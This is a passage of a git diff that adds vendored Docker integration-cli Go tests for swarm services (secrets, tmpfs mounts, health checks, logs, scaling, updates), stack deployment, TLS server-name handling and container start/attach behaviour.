c.Assert(mounts[0].Name, checker.Equals, "foo") + c.Assert(mounts[0].Destination, checker.Equals, "/foo") + c.Assert(mounts[0].RW, checker.Equals, true) +} + +func (s *DockerSwarmSuite) TestServiceCreateWithSecretSimple(c *check.C) { + d := s.AddDaemon(c, true, true) + + serviceName := "test-service-secret" + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", testName, "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.SecretReference + 
c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 1) + + c.Assert(refs[0].SecretName, checker.Equals, testName) + c.Assert(refs[0].File, checker.Not(checker.IsNil)) + c.Assert(refs[0].File.Name, checker.Equals, testName) + c.Assert(refs[0].File.UID, checker.Equals, "0") + c.Assert(refs[0].File.GID, checker.Equals, "0") +} + +func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTarget(c *check.C) { + d := s.AddDaemon(c, true, true) + + serviceName := "test-service-secret" + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + testTarget := "testing" + + out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", fmt.Sprintf("source=%s,target=%s", testName, testTarget), "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.SecretReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 1) + + c.Assert(refs[0].SecretName, checker.Equals, testName) + c.Assert(refs[0].File, checker.Not(checker.IsNil)) + c.Assert(refs[0].File.Name, checker.Equals, testTarget) +} + +func (s *DockerSwarmSuite) TestServiceCreateMountTmpfs(c *check.C) { + d := s.AddDaemon(c, true, true) + out, err := d.Cmd("service", "create", "--mount", "type=tmpfs,target=/foo,tmpfs-size=1MB", "busybox", "sh", "-c", "mount | grep foo; tail -f /dev/null") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.getServiceTasks(c, id) + return len(tasks) > 0, nil + }, 
checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" { + task = d.getTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil + }, checker.Equals, true) + + // check container mount config + out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .HostConfig.Mounts}}", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var mountConfig []mount.Mount + c.Assert(json.Unmarshal([]byte(out), &mountConfig), checker.IsNil) + c.Assert(mountConfig, checker.HasLen, 1) + + c.Assert(mountConfig[0].Source, checker.Equals, "") + c.Assert(mountConfig[0].Target, checker.Equals, "/foo") + c.Assert(mountConfig[0].Type, checker.Equals, mount.TypeTmpfs) + c.Assert(mountConfig[0].TmpfsOptions, checker.NotNil) + c.Assert(mountConfig[0].TmpfsOptions.SizeBytes, checker.Equals, int64(1048576)) + + // check container mounts actual + out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .Mounts}}", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var mounts []types.MountPoint + c.Assert(json.Unmarshal([]byte(out), &mounts), checker.IsNil) + c.Assert(mounts, checker.HasLen, 1) + + c.Assert(mounts[0].Type, checker.Equals, mount.TypeTmpfs) + c.Assert(mounts[0].Name, checker.Equals, "") + c.Assert(mounts[0].Destination, checker.Equals, "/foo") + c.Assert(mounts[0].RW, checker.Equals, true) + + out, err = s.nodeCmd(c, task.NodeID, "logs", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.HasPrefix, "tmpfs on /foo type tmpfs") + c.Assert(strings.TrimSpace(out), checker.Contains, "size=1024k") +} diff --git 
a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go new file mode 100644 index 0000000000..30580f6be3 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go @@ -0,0 +1,191 @@ +// +build !windows + +package main + +import ( + "strconv" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/executor/container" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// start a service, and then make its task unhealthy during running +// finally, unhealthy task should be detected and killed +func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) { + testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + + d := s.AddDaemon(c, true, true) + + // build image with health-check + // note: use `daemon.buildImageWithOut` to build, do not use `buildImage` to build + imageName := "testhealth" + _, _, err := d.buildImageWithOut(imageName, + `FROM busybox + RUN touch /status + HEALTHCHECK --interval=1s --timeout=1s --retries=1\ + CMD cat /status`, + true) + c.Check(err, check.IsNil) + + serviceName := "healthServiceRun" + out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.getServiceTasks(c, id) + return tasks, nil + }, checker.HasLen, 1) + + task := tasks[0] + + // wait for task to start + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateRunning) + containerID := task.Status.ContainerStatus.ContainerID + + // wait for 
container to be healthy + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + out, _ := d.Cmd("inspect", "--format={{.State.Health.Status}}", containerID) + return strings.TrimSpace(out), nil + }, checker.Equals, "healthy") + + // make it fail + d.Cmd("exec", containerID, "rm", "/status") + // wait for container to be unhealthy + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + out, _ := d.Cmd("inspect", "--format={{.State.Health.Status}}", containerID) + return strings.TrimSpace(out), nil + }, checker.Equals, "unhealthy") + + // Task should be terminated + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateFailed) + + if !strings.Contains(task.Status.Err, container.ErrContainerUnhealthy.Error()) { + c.Fatal("unhealthy task exits because of other error") + } +} + +// start a service whose task is unhealthy at beginning +// its tasks should be blocked in starting stage, until health check is passed +func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) { + testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + + d := s.AddDaemon(c, true, true) + + // service started from this image won't pass health check + imageName := "testhealth" + _, _, err := d.buildImageWithOut(imageName, + `FROM busybox + HEALTHCHECK --interval=1s --timeout=1s --retries=1024\ + CMD cat /status`, + true) + c.Check(err, check.IsNil) + + serviceName := "healthServiceStart" + out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.getServiceTasks(c, id) + return tasks, 
nil + }, checker.HasLen, 1) + + task := tasks[0] + + // wait for task to start + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateStarting) + + containerID := task.Status.ContainerStatus.ContainerID + + // wait for health check to work + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + out, _ := d.Cmd("inspect", "--format={{.State.Health.FailingStreak}}", containerID) + failingStreak, _ := strconv.Atoi(strings.TrimSpace(out)) + return failingStreak, nil + }, checker.GreaterThan, 0) + + // task should be blocked at starting status + task = d.getTask(c, task.ID) + c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting) + + // make it healthy + d.Cmd("exec", containerID, "touch", "/status") + + // Task should be at running status + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateRunning) +} + +// start a service whose task is unhealthy at beginning +// its tasks should be blocked in starting stage, until health check is passed +func (s *DockerSwarmSuite) TestServiceHealthUpdate(c *check.C) { + testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + + d := s.AddDaemon(c, true, true) + + // service started from this image won't pass health check + imageName := "testhealth" + _, _, err := d.buildImageWithOut(imageName, + `FROM busybox + HEALTHCHECK --interval=1s --timeout=1s --retries=1024\ + CMD cat /status`, + true) + c.Check(err, check.IsNil) + + serviceName := "healthServiceStart" + out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + 
waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.getServiceTasks(c, id) + return tasks, nil + }, checker.HasLen, 1) + + task := tasks[0] + + // wait for task to start + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateStarting) + + containerID := task.Status.ContainerStatus.ContainerID + + // wait for health check to work + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + out, _ := d.Cmd("inspect", "--format={{.State.Health.FailingStreak}}", containerID) + failingStreak, _ := strconv.Atoi(strings.TrimSpace(out)) + return failingStreak, nil + }, checker.GreaterThan, 0) + + // task should be blocked at starting status + task = d.getTask(c, task.ID) + c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting) + + // make it healthy + d.Cmd("exec", containerID, "touch", "/status") + // Task should be at running status + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateRunning) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go new file mode 100644 index 0000000000..c2216543d7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go @@ -0,0 +1,96 @@ +// +build !windows + +package main + +import ( + "bufio" + "fmt" + "io" + "os/exec" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +type logMessage struct { + err error + data []byte +} + +func (s *DockerSwarmSuite) TestServiceLogs(c 
*check.C) { + testRequires(c, ExperimentalDaemon) + + d := s.AddDaemon(c, true, true) + + // we have multiple services here for detecting the goroutine issue #28915 + services := map[string]string{ + "TestServiceLogs1": "hello1", + "TestServiceLogs2": "hello2", + } + + for name, message := range services { + out, err := d.Cmd("service", "create", "--name", name, "busybox", + "sh", "-c", fmt.Sprintf("echo %s; tail -f /dev/null", message)) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + } + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, + d.checkActiveContainerCount, checker.Equals, len(services)) + + for name, message := range services { + out, err := d.Cmd("service", "logs", name) + c.Assert(err, checker.IsNil) + c.Logf("log for %q: %q", name, out) + c.Assert(out, checker.Contains, message) + } +} + +func (s *DockerSwarmSuite) TestServiceLogsFollow(c *check.C) { + testRequires(c, ExperimentalDaemon) + + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsFollow" + + out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", "while true; do echo log test; sleep 0.1; done") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + args := []string{"service", "logs", "-f", name} + cmd := exec.Command(dockerBinary, d.prependHostArg(args)...) 
+ r, w := io.Pipe() + cmd.Stdout = w + cmd.Stderr = w + c.Assert(cmd.Start(), checker.IsNil) + + // Make sure pipe is written to + ch := make(chan *logMessage) + done := make(chan struct{}) + go func() { + reader := bufio.NewReader(r) + for { + msg := &logMessage{} + msg.data, _, msg.err = reader.ReadLine() + select { + case ch <- msg: + case <-done: + return + } + } + }() + + for i := 0; i < 3; i++ { + msg := <-ch + c.Assert(msg.err, checker.IsNil) + c.Assert(string(msg.data), checker.Contains, "log test") + } + close(done) + + c.Assert(cmd.Process.Kill(), checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go new file mode 100644 index 0000000000..29cca2358d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go @@ -0,0 +1,57 @@ +// +build !windows + +package main + +import ( + "fmt" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestServiceScale(c *check.C) { + d := s.AddDaemon(c, true, true) + + service1Name := "TestService1" + service1Args := append([]string{"service", "create", "--name", service1Name, defaultSleepImage}, sleepCommandForDaemonPlatform()...) + + // global mode + service2Name := "TestService2" + service2Args := append([]string{"service", "create", "--name", service2Name, "--mode=global", defaultSleepImage}, sleepCommandForDaemonPlatform()...) + + // Create services + out, err := d.Cmd(service1Args...) + c.Assert(err, checker.IsNil) + + out, err = d.Cmd(service2Args...) 
+ c.Assert(err, checker.IsNil) + + out, err = d.Cmd("service", "scale", "TestService1=2") + c.Assert(err, checker.IsNil) + + out, err = d.Cmd("service", "scale", "TestService1=foobar") + c.Assert(err, checker.NotNil) + + str := fmt.Sprintf("%s: invalid replicas value %s", service1Name, "foobar") + if !strings.Contains(out, str) { + c.Errorf("got: %s, expected has sub string: %s", out, str) + } + + out, err = d.Cmd("service", "scale", "TestService1=-1") + c.Assert(err, checker.NotNil) + + str = fmt.Sprintf("%s: invalid replicas value %s", service1Name, "-1") + if !strings.Contains(out, str) { + c.Errorf("got: %s, expected has sub string: %s", out, str) + } + + // TestService2 is a global mode + out, err = d.Cmd("service", "scale", "TestService2=2") + c.Assert(err, checker.NotNil) + + str = fmt.Sprintf("%s: scale can only be used with replicated mode\n", service2Name) + if out != str { + c.Errorf("got: %s, expected: %s", out, str) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go new file mode 100644 index 0000000000..837370ceeb --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go @@ -0,0 +1,130 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestServiceUpdatePort(c *check.C) { + d := s.AddDaemon(c, true, true) + + serviceName := "TestServiceUpdatePort" + serviceArgs := append([]string{"service", "create", "--name", serviceName, "-p", "8080:8081", defaultSleepImage}, sleepCommandForDaemonPlatform()...) + + // Create a service with a port mapping of 8080:8081. + out, err := d.Cmd(serviceArgs...) 
+ c.Assert(err, checker.IsNil) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // Update the service: changed the port mapping from 8080:8081 to 8082:8083. + _, err = d.Cmd("service", "update", "--publish-add", "8082:8083", "--publish-rm", "8081", serviceName) + c.Assert(err, checker.IsNil) + + // Inspect the service and verify port mapping + expected := []swarm.PortConfig{ + { + Protocol: "tcp", + PublishedPort: 8082, + TargetPort: 8083, + PublishMode: "ingress", + }, + } + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.EndpointSpec.Ports }}", serviceName) + c.Assert(err, checker.IsNil) + + var portConfig []swarm.PortConfig + if err := json.Unmarshal([]byte(out), &portConfig); err != nil { + c.Fatalf("invalid JSON in inspect result: %v (%s)", err, out) + } + c.Assert(portConfig, checker.DeepEquals, expected) +} + +func (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) { + d := s.AddDaemon(c, true, true) + out, err := d.Cmd("service", "create", "--name=test", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service := d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 0) + + // add label to empty set + out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service = d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 1) + c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar") + + // add label to non-empty set + out, err = d.Cmd("service", "update", "test", "--label-add", "foo2=bar") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service = d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 2) + c.Assert(service.Spec.Labels["foo2"], checker.Equals, "bar") + + out, err = d.Cmd("service", "update", "test", "--label-rm", "foo2") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service = d.getService(c, "test") + 
c.Assert(service.Spec.Labels, checker.HasLen, 1) + c.Assert(service.Spec.Labels["foo2"], checker.Equals, "") + + out, err = d.Cmd("service", "update", "test", "--label-rm", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service = d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 0) + c.Assert(service.Spec.Labels["foo"], checker.Equals, "") + + // now make sure we can add again + out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar") + c.Assert(err, checker.IsNil, check.Commentf(out)) + service = d.getService(c, "test") + c.Assert(service.Spec.Labels, checker.HasLen, 1) + c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar") +} + +func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) { + d := s.AddDaemon(c, true, true) + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + testTarget := "testing" + serviceName := "test" + + out, err := d.Cmd("service", "create", "--name", serviceName, "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // add secret + out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.SecretReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 1) + + c.Assert(refs[0].SecretName, checker.Equals, testName) + c.Assert(refs[0].File, checker.Not(checker.IsNil)) + c.Assert(refs[0].File.Name, checker.Equals, testTarget) + + // remove + out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-rm", testName) + 
c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) + c.Assert(err, checker.IsNil) + + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 0) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go new file mode 100644 index 0000000000..fb896d52d5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go @@ -0,0 +1,44 @@ +package main + +import ( + "fmt" + "io/ioutil" + "log" + "net/http" + "net/http/httptest" + "net/url" + "os/exec" + "strings" + + "github.com/go-check/check" +) + +func (s *DockerSuite) TestClientSetsTLSServerName(c *check.C) { + c.Skip("Flakey test") + // there may be more than one hit to the server for each registry request + serverNameReceived := []string{} + var serverName string + + virtualHostServer := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + serverNameReceived = append(serverNameReceived, r.TLS.ServerName) + })) + defer virtualHostServer.Close() + // discard TLS handshake errors written by default to os.Stderr + virtualHostServer.Config.ErrorLog = log.New(ioutil.Discard, "", 0) + + u, err := url.Parse(virtualHostServer.URL) + c.Assert(err, check.IsNil) + hostPort := u.Host + serverName = strings.Split(hostPort, ":")[0] + + repoName := fmt.Sprintf("%v/dockercli/image:latest", hostPort) + cmd := exec.Command(dockerBinary, "pull", repoName) + cmd.Run() + + // check that the fake server was hit at least once + c.Assert(len(serverNameReceived) > 0, check.Equals, true) + // check that for each hit the right server name was received + for _, item := range serverNameReceived { + c.Check(item, check.Equals, serverName) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go new file mode 100644 index 0000000000..fd9b15449d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go @@ -0,0 +1,186 @@ +package main + +import ( + "encoding/json" + "io/ioutil" + "os" + "sort" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestStackRemoveUnknown(c *check.C) { + d := s.AddDaemon(c, true, true) + + stackArgs := append([]string{"stack", "remove", "UNKNOWN_STACK"}) + + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") +} + +func (s *DockerSwarmSuite) TestStackPSUnknown(c *check.C) { + d := s.AddDaemon(c, true, true) + + stackArgs := append([]string{"stack", "ps", "UNKNOWN_STACK"}) + + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") +} + +func (s *DockerSwarmSuite) TestStackServicesUnknown(c *check.C) { + d := s.AddDaemon(c, true, true) + + stackArgs := append([]string{"stack", "services", "UNKNOWN_STACK"}) + + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n") +} + +func (s *DockerSwarmSuite) TestStackDeployComposeFile(c *check.C) { + d := s.AddDaemon(c, true, true) + + testStackName := "testdeploy" + stackArgs := []string{ + "stack", "deploy", + "--compose-file", "fixtures/deploy/default.yaml", + testStackName, + } + out, err := d.Cmd(stackArgs...) 
+ c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("stack", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "NAME SERVICES\n"+"testdeploy 2\n") + + out, err = d.Cmd("stack", "rm", testStackName) + c.Assert(err, checker.IsNil) + out, err = d.Cmd("stack", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "NAME SERVICES\n") +} + +func (s *DockerSwarmSuite) TestStackDeployWithSecretsTwice(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("secret", "create", "outside", "fixtures/secrets/default") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + testStackName := "testdeploy" + stackArgs := []string{ + "stack", "deploy", + "--compose-file", "fixtures/deploy/secrets.yaml", + testStackName, + } + out, err = d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", "testdeploy_web") + c.Assert(err, checker.IsNil) + + var refs []swarm.SecretReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 3) + + sort.Sort(sortSecrets(refs)) + c.Assert(refs[0].SecretName, checker.Equals, "outside") + c.Assert(refs[1].SecretName, checker.Equals, "testdeploy_special") + c.Assert(refs[1].File.Name, checker.Equals, "special") + c.Assert(refs[2].SecretName, checker.Equals, "testdeploy_super") + c.Assert(refs[2].File.Name, checker.Equals, "foo.txt") + c.Assert(refs[2].File.Mode, checker.Equals, os.FileMode(0400)) + + // Deploy again to ensure there are no errors when secret hasn't changed + out, err = d.Cmd(stackArgs...) 
+ c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestStackRemove(c *check.C) { + d := s.AddDaemon(c, true, true) + + stackName := "testdeploy" + stackArgs := []string{ + "stack", "deploy", + "--compose-file", "fixtures/deploy/remove.yaml", + stackName, + } + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("stack", "ps", stackName) + c.Assert(err, checker.IsNil) + c.Assert(strings.Split(strings.TrimSpace(out), "\n"), checker.HasLen, 2) + + out, err = d.Cmd("stack", "rm", stackName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Removing service testdeploy_web") + c.Assert(out, checker.Contains, "Removing network testdeploy_default") + c.Assert(out, checker.Contains, "Removing secret testdeploy_special") +} + +type sortSecrets []swarm.SecretReference + +func (s sortSecrets) Len() int { return len(s) } +func (s sortSecrets) Swap(i, j int) { s[i], s[j] = s[j], s[i] } +func (s sortSecrets) Less(i, j int) bool { return s[i].SecretName < s[j].SecretName } + +// testDAB is the DAB JSON used for testing. 
+// TODO: Use template/text and substitute "Image" with the result of +// `docker inspect --format '{{index .RepoDigests 0}}' busybox:latest` +const testDAB = `{ + "Version": "0.1", + "Services": { + "srv1": { + "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0", + "Command": ["top"] + }, + "srv2": { + "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0", + "Command": ["tail"], + "Args": ["-f", "/dev/null"] + } + } +}` + +func (s *DockerSwarmSuite) TestStackDeployWithDAB(c *check.C) { + testRequires(c, ExperimentalDaemon) + // setup + testStackName := "test" + testDABFileName := testStackName + ".dab" + defer os.RemoveAll(testDABFileName) + err := ioutil.WriteFile(testDABFileName, []byte(testDAB), 0444) + c.Assert(err, checker.IsNil) + d := s.AddDaemon(c, true, true) + // deploy + stackArgs := []string{ + "stack", "deploy", + "--bundle-file", testDABFileName, + testStackName, + } + out, err := d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Loading bundle from test.dab\n") + c.Assert(out, checker.Contains, "Creating service test_srv1\n") + c.Assert(out, checker.Contains, "Creating service test_srv2\n") + // ls + stackArgs = []string{"stack", "ls"} + out, err = d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "NAME SERVICES\n"+"test 2\n") + // rm + stackArgs = []string{"stack", "rm", testStackName} + out, err = d.Cmd(stackArgs...) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Removing service test_srv1\n") + c.Assert(out, checker.Contains, "Removing service test_srv2\n") + // ls (empty) + stackArgs = []string{"stack", "ls"} + out, err = d.Cmd(stackArgs...) 
+ c.Assert(err, checker.IsNil) + c.Assert(out, check.Equals, "NAME SERVICES\n") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go new file mode 100644 index 0000000000..b1cea35872 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go @@ -0,0 +1,199 @@ +package main + +import ( + "fmt" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// Regression test for https://github.com/docker/docker/issues/7843 +func (s *DockerSuite) TestStartAttachReturnsOnError(c *check.C) { + // Windows does not support link + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test", "busybox") + + // Expect this to fail because the above container is stopped, this is what we want + out, _, err := dockerCmdWithError("run", "--name", "test2", "--link", "test:test", "busybox") + // err shouldn't be nil because container test2 try to link to stopped container + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + + ch := make(chan error) + go func() { + // Attempt to start attached to the container that won't start + // This should return an error immediately since the container can't be started + if out, _, err := dockerCmdWithError("start", "-a", "test2"); err == nil { + ch <- fmt.Errorf("Expected error but got none:\n%s", out) + } + close(ch) + }() + + select { + case err := <-ch: + c.Assert(err, check.IsNil) + case <-time.After(5 * time.Second): + c.Fatalf("Attach did not exit properly") + } +} + +// gh#8555: Exit code should be passed through when using start -a +func (s *DockerSuite) TestStartAttachCorrectExitCode(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _, _ := 